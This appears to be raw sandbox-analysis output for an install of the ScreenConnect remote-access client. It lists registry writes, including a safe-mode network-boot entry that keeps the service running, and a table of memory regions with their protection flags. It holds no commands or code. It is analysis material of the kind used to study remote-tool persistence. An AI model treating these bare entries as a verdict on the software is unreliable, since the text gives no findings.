HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\Files
ScreenConnect.Core.dll_b96889d378047e27
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\Files
ScreenConnect.Core.dll_b96889d378047e27
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\Files
ScreenConnect.Client.dll_fc1d7bd48553fcab
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\Files
ScreenConnect.Client.dll_fc1d7bd48553fcab
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\Files
ScreenConnect.ClientService.dll_e781b1c636f7bfae
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\Files
ScreenConnect.ClientService.dll_e781b1c636f7bfae
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment
OnlineAppQuotaUsageEstimate
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
lock!1000000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
lock!0e00000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
lock!0c00000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
lock!0a00000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
lock!0800000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
lock!0600000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
lock!0400000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
PreparedForExecution
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
lock!1100000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.ClientService.exe_5e8c1e841cd8db20
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsBackstageShell.exe_89b7a517a15abfdc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsFileManager.exe.config_5db10293a642be8a
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsClient.exe.config_432322067acab5c0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsBackstageShell.exe.config_bc78256f1e952942
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
ScreenConnect.WindowsFileManager.exe_74b82db4db38179e
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\Files
ScreenConnect.ClientService.dll_5e8c1e5c1cd8d9ee
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\Files
ScreenConnect.WindowsClient.exe_fd0fcfe1fd1a6cd2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\Files
ScreenConnect.Core.dll_963930cc5ced28c7
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\Files
ScreenConnect.Client.dll_7b0ea606092ddbcb
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\Files
ScreenConnect.Windows.dll_fa5f7fd8f7c108bb
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
SubstructureCreated
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
lock!0e000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
lock!0c000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
lock!0a000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
lock!08000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
lock!06000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
lock!04000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
lock!02000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
lock!1c000000c6775e00581c00007414000000000000000000008112b84e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
lock!1a000000c6775e00581c00007414000000000000000000008112b84e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
lock!18000000c6775e00581c00007414000000000000000000008112b84e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
lock!16000000c6775e00581c00007414000000000000000000008112b84e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
lock!14000000c6775e00581c00007414000000000000000000008112b84e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
lock!12000000c6775e00581c00007414000000000000000000008112b84e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
lock!10000000c6775e00581c00007414000000000000000000008112b84e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
lock!1d000000e6775e00581c000074140000000000000000000050f5bc4e312adb01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_1bac53f2fcbb97b7
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_d3d1911171305958
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
HasRunBefore
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (5999b697-2fc8-47f6-a1dc-4d0d274c363e)
NULL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (5999b697-2fc8-47f6-a1dc-4d0d274c363e)
ImagePath
There are 155 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FFEB89E0000
trusted library allocation
page execute and read and write
CE5000
heap
page read and write
227BD150000
remote allocation
page read and write
261000
unkown
page write copy
267EA88A000
heap
page read and write
1406000
trusted library allocation
page execute and read and write
17F979F0000
heap
page read and write
267EA82B000
heap
page read and write
212A1883000
heap
page execute and read and write
1B51E000
stack
page read and write
AB22C34000
stack
page read and write
ED5DDFE000
stack
page read and write
46AE000
stack
page read and write
4E00000
trusted library allocation
page execute and read and write
7FFEB8999000
trusted library allocation
page read and write
DCE000
stack
page read and write
ACA000
heap
page read and write
1BE40000
trusted library allocation
page read and write
7FFEB8896000
trusted library allocation
page read and write
14C0000
trusted library allocation
page execute and read and write
C40000
trusted library allocation
page read and write
ED5DCFE000
stack
page read and write
24F9463F000
heap
page read and write
24F94613000
heap
page read and write
227B8002000
heap
page read and write
7FFEB881B000
trusted library allocation
page execute and read and write
212BC110000
heap
page read and write
212A3976000
trusted library allocation
page read and write
2217044C000
heap
page read and write
7FFEB8803000
trusted library allocation
page read and write
227B8EF7000
heap
page read and write
24F94E02000
trusted library allocation
page read and write
2A4E000
stack
page read and write
227B789B000
heap
page read and write
2F20000
heap
page execute and read and write
7FFEB8A10000
trusted library allocation
page read and write
1710000
trusted library allocation
page read and write
24F94681000
heap
page read and write
16FD000
trusted library allocation
page execute and read and write
2E2E000
stack
page read and write
212BBF80000
heap
page read and write
CF61E7E000
unkown
page readonly
D80000
heap
page read and write
212A36CA000
trusted library allocation
page read and write
CF624FE000
stack
page read and write
1F8A4E38000
heap
page read and write
212BD671000
heap
page read and write
212BD620000
heap
page read and write
212BEE60000
heap
page read and write
5400000
unkown
page readonly
267EA720000
heap
page read and write
D6E000
stack
page read and write
231E000
trusted library allocation
page read and write
4D5D000
stack
page read and write
1BAA0000
heap
page read and write
9AF01FE000
stack
page read and write
24F9465E000
heap
page read and write
7FFEB880B000
trusted library allocation
page execute and read and write
F43ABFE000
unkown
page readonly
212BBFB0000
heap
page read and write
227B9000000
trusted library allocation
page read and write
212BD520000
heap
page read and write
7FFEB884C000
trusted library allocation
page execute and read and write
1412000
trusted library allocation
page read and write
227B8E91000
heap
page read and write
13041000
trusted library allocation
page read and write
227BD150000
remote allocation
page read and write
9AEFCEC000
stack
page read and write
7FFEB87FD000
trusted library allocation
page execute and read and write
CF6307E000
unkown
page readonly
DE0000
heap
page read and write
212A15E0000
trusted library allocation
page read and write
107F000
stack
page read and write
7FFEB8A66000
trusted library allocation
page read and write
17F994A0000
heap
page read and write
212A348D000
trusted library allocation
page read and write
227B8391000
trusted library allocation
page read and write
7FFEB8AB0000
trusted library allocation
page read and write
7FFEB89E6000
trusted library allocation
page read and write
12FF000
heap
page read and write
9A0000
heap
page read and write
1B493000
heap
page read and write
CF6177E000
unkown
page readonly
32BE000
stack
page read and write
212BBFA0000
heap
page read and write
212A1A60000
heap
page read and write
CCF000
heap
page read and write
CF61A7E000
unkown
page readonly
227B7827000
heap
page read and write
7FFEB89B0000
trusted library allocation
page read and write
267EA900000
heap
page read and write
1740000
trusted library allocation
page read and write
7FFEB89D0000
trusted library allocation
page execute and read and write
CF61FFE000
stack
page read and write
1F8A5602000
trusted library allocation
page read and write
F43B4FE000
unkown
page readonly
24F94662000
heap
page read and write
1B410000
heap
page read and write
12A51000
trusted library allocation
page read and write
7FFEB8999000
trusted library allocation
page read and write
7FFEB8900000
trusted library allocation
page execute and read and write
A40000
heap
page read and write
1F8A4DC0000
trusted library allocation
page read and write
5C00000
heap
page read and write
7FFEB8A50000
trusted library allocation
page read and write
7FFEB8AF0000
trusted library allocation
page read and write
AFE000
heap
page read and write
7FFEB8B90000
trusted library allocation
page read and write
24F944F0000
heap
page read and write
1F8A4E13000
heap
page read and write
227B8EDB000
heap
page read and write
7FFEB8AD0000
trusted library allocation
page read and write
22170513000
heap
page read and write
7E0000
heap
page read and write
ABC000
heap
page read and write
212BD6C3000
heap
page read and write
5DFB000
stack
page read and write
EED000
stack
page read and write
CF6147C000
stack
page read and write
227B7883000
heap
page read and write
212A32B0000
trusted library allocation
page read and write
9CD41FE000
unkown
page readonly
1B429000
heap
page read and write
7FFEB8A90000
trusted library allocation
page read and write
24F946A0000
heap
page read and write
7FFEB8B40000
trusted library allocation
page read and write
7FFEB8BF0000
trusted library allocation
page execute and read and write
227B88E0000
trusted library allocation
page read and write
CF6227E000
unkown
page readonly
7FFEB87E3000
trusted library allocation
page execute and read and write
7FFEB8800000
trusted library allocation
page read and write
61BE000
stack
page read and write
227B810C000
heap
page read and write
18D22FE000
stack
page read and write
F43B0FE000
unkown
page readonly
1402000
trusted library allocation
page read and write
2F81000
trusted library allocation
page read and write
7FFEB8AA0000
trusted library allocation
page read and write
5950000
trusted library allocation
page read and write
16B0000
trusted library section
page read and write
1B32E000
stack
page read and write
227B8ED6000
heap
page read and write
7FFEB8A20000
trusted library allocation
page read and write
F43ACFE000
stack
page read and write
24F94624000
heap
page read and write
227B8E00000
heap
page read and write
22170C00000
heap
page read and write
227B8EFD000
heap
page read and write
13ED000
trusted library allocation
page execute and read and write
AB2347D000
stack
page read and write
37CE000
stack
page read and write
212B33D2000
trusted library allocation
page read and write
9B0000
heap
page read and write
7FFEB880D000
trusted library allocation
page execute and read and write
267EA780000
trusted library allocation
page read and write
267EA800000
heap
page read and write
2E70000
trusted library allocation
page read and write
1B4C7000
heap
page read and write
267EA813000
heap
page read and write
212A3A4E000
trusted library allocation
page read and write
17F979E0000
heap
page read and write
AB2357E000
stack
page read and write
227B8113000
heap
page read and write
2A40000
heap
page execute and read and write
4C60000
trusted library allocation
page read and write
CF61D7B000
stack
page read and write
12E9000
heap
page read and write
7FFEB8814000
trusted library allocation
page read and write
AB2327D000
stack
page read and write
1B6F2000
heap
page read and write
AB2367E000
stack
page read and write
D03000
heap
page read and write
319A000
trusted library allocation
page read and write
212BEEE0000
heap
page read and write
BEC000
stack
page read and write
804000
unkown
page write copy
212A1470000
heap
page read and write
7FFEB87F0000
trusted library allocation
page read and write
212BD584000
heap
page read and write
9AF027E000
unkown
page readonly
CF6157E000
unkown
page readonly
17F97C80000
heap
page read and write
24F94670000
heap
page read and write
7FFEB89F0000
trusted library allocation
page read and write
212BEF24000
heap
page read and write
7FFEB89F6000
trusted library allocation
page read and write
7FFEB87F4000
trusted library allocation
page read and write
7FFEB8804000
trusted library allocation
page read and write
212BBFFF000
heap
page read and write
E85000
heap
page read and write
1B469000
heap
page read and write
22170465000
heap
page read and write
227B8F02000
heap
page read and write
7FFEB8B74000
trusted library allocation
page read and write
212BF052000
heap
page read and write
17ED000
stack
page read and write
AB2337D000
stack
page read and write
4D9D000
stack
page read and write
227B787D000
heap
page read and write
3182000
trusted library allocation
page read and write
F43B2FE000
unkown
page readonly
F43ADFE000
unkown
page readonly
DD0000
heap
page read and write
E6E000
stack
page read and write
16E4000
trusted library allocation
page read and write
45B7000
trusted library allocation
page read and write
7FFEB8B80000
trusted library allocation
page read and write
212A341C000
trusted library allocation
page read and write
212BD667000
heap
page read and write
212A329F000
trusted library allocation
page read and write
1B439000
heap
page read and write
227B811A000
heap
page read and write
33B6000
trusted library allocation
page read and write
7FFEB87FD000
trusted library allocation
page execute and read and write
24F94648000
heap
page read and write
212A3944000
trusted library allocation
page read and write
7FFEB880D000
trusted library allocation
page execute and read and write
D90000
heap
page read and write
7FFEB87FD000
trusted library allocation
page execute and read and write
7FFEB88D6000
trusted library allocation
page execute and read and write
227B7895000
heap
page read and write
1C80D000
stack
page read and write
10D4000
heap
page read and write
212BB9C3000
heap
page read and write
1727000
trusted library allocation
page execute and read and write
1F7E000
stack
page read and write
24F94641000
heap
page read and write
1B4E5000
heap
page read and write
212A1650000
heap
page read and write
10D0000
trusted library section
page read and write
1F8A4E02000
heap
page read and write
DF0000
heap
page read and write
12EE000
stack
page read and write
7FFEB89B0000
trusted library allocation
page read and write
212A16AC000
heap
page read and write
7FFEB87E4000
trusted library allocation
page read and write
22170C15000
heap
page read and write
CF6098B000
stack
page read and write
1AEED000
stack
page read and write
AE4000
heap
page read and write
227B8D20000
trusted library allocation
page read and write
1B484000
heap
page read and write
7FFEB88A0000
trusted library allocation
page read and write
4C40000
trusted library allocation
page read and write
7FFEB8A50000
trusted library allocation
page read and write
250000
unkown
page readonly
7FFEB8C90000
trusted library allocation
page read and write
1B62E000
stack
page read and write
212B34A0000
trusted library allocation
page read and write
227B8F1B000
heap
page read and write
F43A47D000
stack
page read and write
7FFEB8B8C000
trusted library allocation
page read and write
24F94654000
heap
page read and write
AB2397E000
stack
page read and write
10FD000
stack
page read and write
13E4000
trusted library allocation
page read and write
1B3B0000
trusted library allocation
page read and write
7FFEB88AC000
trusted library allocation
page execute and read and write
F43AEFD000
stack
page read and write
24F94630000
heap
page read and write
1B520000
heap
page read and write
2E72000
unkown
page readonly
1B72E000
stack
page read and write
212F000
trusted library allocation
page read and write
212BD55B000
heap
page read and write
1BDCA000
heap
page read and write
1309000
heap
page read and write
DD0000
heap
page read and write
9AEFDEE000
stack
page read and write
212A3210000
heap
page execute and read and write
212BEFED000
heap
page read and write
13F0000
trusted library allocation
page read and write
212A3473000
trusted library allocation
page read and write
212BEFF6000
heap
page read and write
A30000
heap
page read and write
3442000
trusted library allocation
page read and write
7FFEB8A5D000
trusted library allocation
page read and write
5AFD000
stack
page read and write
212B3449000
trusted library allocation
page read and write
CF61C7E000
unkown
page readonly
24F94673000
heap
page read and write
30F8000
trusted library allocation
page read and write
804000
unkown
page read and write
212A1736000
heap
page read and write
45C1000
trusted library allocation
page read and write
24F9469D000
heap
page read and write
212BD62A000
heap
page read and write
251000
unkown
page execute read
2A71000
trusted library allocation
page read and write
2940000
heap
page execute and read and write
CF6277E000
stack
page read and write
1C616000
stack
page read and write
2E90000
trusted library allocation
page read and write
227B7913000
heap
page read and write
24F9469F000
heap
page read and write
7FFEB8991000
trusted library allocation
page read and write
227B8F14000
heap
page read and write
9CD3FFE000
unkown
page readonly
CA0000
heap
page read and write
1B524000
heap
page read and write
7FFEB8A70000
trusted library allocation
page read and write
7FFEB87E0000
trusted library allocation
page read and write
24F94695000
heap
page read and write
227B8640000
trusted library allocation
page read and write
1B6B0000
heap
page read and write
7FFEB89EC000
trusted library allocation
page read and write
1BD8D000
heap
page read and write
2A5F000
trusted library allocation
page read and write
C00000
heap
page read and write
1315000
heap
page read and write
4500000
trusted library allocation
page read and write
56C0000
trusted library allocation
page execute and read and write
16B5000
heap
page read and write
1F8A4C90000
heap
page read and write
212A3986000
trusted library allocation
page read and write
227BD090000
trusted library allocation
page read and write
212BEF4C000
heap
page read and write
D8B000
heap
page read and write
7FFEB8A30000
trusted library allocation
page read and write
199F000
stack
page read and write
24F94665000
heap
page read and write
AEE000
heap
page read and write
7FFEB88A6000
trusted library allocation
page read and write
10B0000
heap
page read and write
4C50000
trusted library allocation
page read and write
212BB250000
trusted library allocation
page read and write
1600000
heap
page read and write
3183000
trusted library allocation
page read and write
7FFEB8B80000
trusted library allocation
page read and write
1660000
trusted library allocation
page read and write
1B44C000
heap
page read and write
E77000
heap
page read and write
CF61AFE000
stack
page read and write
7FF44FFC0000
trusted library allocation
page execute and read and write
D2B000
heap
page read and write
212A346A000
trusted library allocation
page read and write
1707000
heap
page read and write
E8B000
heap
page read and write
327E000
stack
page read and write
7FFEB8910000
trusted library allocation
page execute and read and write
267EA822000
heap
page read and write
7FFEB89B2000
trusted library allocation
page read and write
221703A0000
trusted library allocation
page read and write
1BEB0000
heap
page read and write
147E000
stack
page read and write
7FFEB8A06000
trusted library allocation
page read and write
D73000
heap
page read and write
1B8C0000
unkown
page readonly
4590000
trusted library allocation
page execute and read and write
7FFEB8B70000
trusted library allocation
page read and write
7FFEB8C00000
trusted library allocation
page read and write
D86000
heap
page read and write
212A346F000
trusted library allocation
page read and write
CF6197E000
unkown
page readonly
227B78DC000
heap
page read and write
10E0000
heap
page read and write
806000
unkown
page readonly
212A1570000
heap
page read and write
24F9466B000
heap
page read and write
7FFEB8920000
trusted library allocation
page execute and read and write
1367000
heap
page read and write
261000
unkown
page read and write
9AF077E000
stack
page read and write
1239000
heap
page read and write
C5C000
stack
page read and write
212A1750000
trusted library allocation
page read and write
9CD39FE000
unkown
page readonly
B26000
heap
page read and write
212BBFEB000
heap
page read and write
7FFEB8B60000
trusted library allocation
page read and write
7FFEB881A000
trusted library allocation
page read and write
1D2E0000
heap
page read and write
24F94657000
heap
page read and write
212A398A000
trusted library allocation
page read and write
24F9464C000
heap
page read and write
1F8A4E34000
heap
page read and write
212BBFDF000
heap
page read and write
F43AFFE000
unkown
page readonly
1BD72000
heap
page read and write
1415000
trusted library allocation
page execute and read and write
1BB00000
unkown
page readonly
1673000
trusted library allocation
page read and write
212A36CE000
trusted library allocation
page read and write
172B000
trusted library allocation
page execute and read and write
D66000
heap
page read and write
227BE000000
heap
page read and write
227B8EF0000
heap
page read and write
